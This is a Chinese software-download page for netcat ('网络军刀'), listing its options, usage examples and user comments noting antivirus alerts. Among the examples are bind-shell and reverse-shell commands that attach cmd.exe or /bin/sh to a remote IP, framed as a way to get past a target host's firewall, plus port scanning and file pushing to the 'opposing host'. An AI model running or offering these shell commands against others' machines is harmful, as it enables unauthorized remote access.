网络军刀 nc 下载

时间:2013-02-19 11:22:20
【文件属性】:
文件名称:网络军刀 nc 下载
文件大小:28KB
文件格式:EXE
更新时间:2013-02-19 11:22:20
nc,网络军刀 参数说明: -h 查看帮助信息 -d 后台模式 -e prog程序重定向,一但连接就执行〔危险〕 -i secs延时的间隔 -l 监听模式,用于入站连接 -L 监听模式,连接天闭后仍然继续监听,直到CTR+C -n IP地址,不能用域名 -o film记录16进制的传输 -p[空格]端口 本地端口号 -r 随机本地及远程端口 -t 使用Telnet交互方式 -u UDP模式 -v 详细输出,用-vv将更详细 -w数字 timeout延时间隔 -z 将输入,输出关掉(用于扫锚时) 基本用法: nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 nc -l -p 80 开启本机的TCP 80端口并监听 nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 高级用法: nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 nc -L -p 80 > c:\log.*t 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.*t nc -L -p 80 < c:\honeyport.*t 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.*t中内容送入管道中,亦可起到传送文件作用 type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.*t中内容送入管道中,亦可起到传送文件作用 本机上用:nc -l -p 本机端口 在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称 在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机 备 注: | 管道命令 < 或 > 重定向命令。“<”,例如:tlntadmn < test.*t 指把test.*t的内容赋值给tlntadmn命令 @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt >> d:\log.*t 意思是:后台执行dir,并把结果存在d:\log.*t中 >与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。 如:@dir c:\winnt >> d:\log.*t和@dir c:\winnt > d:\log.*t二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。

网友评论

  • win7下用不了,病毒!?
  • 好用,会误报
  • 挺不错,有源码
  • 已经使用好久了,很好
  • 比较好的资源,我学到了很多的win+R的命令
  • 感谢分享,不知道有没有Linux下的工具啊?
  • 挺好用的资源,只是电脑会报病毒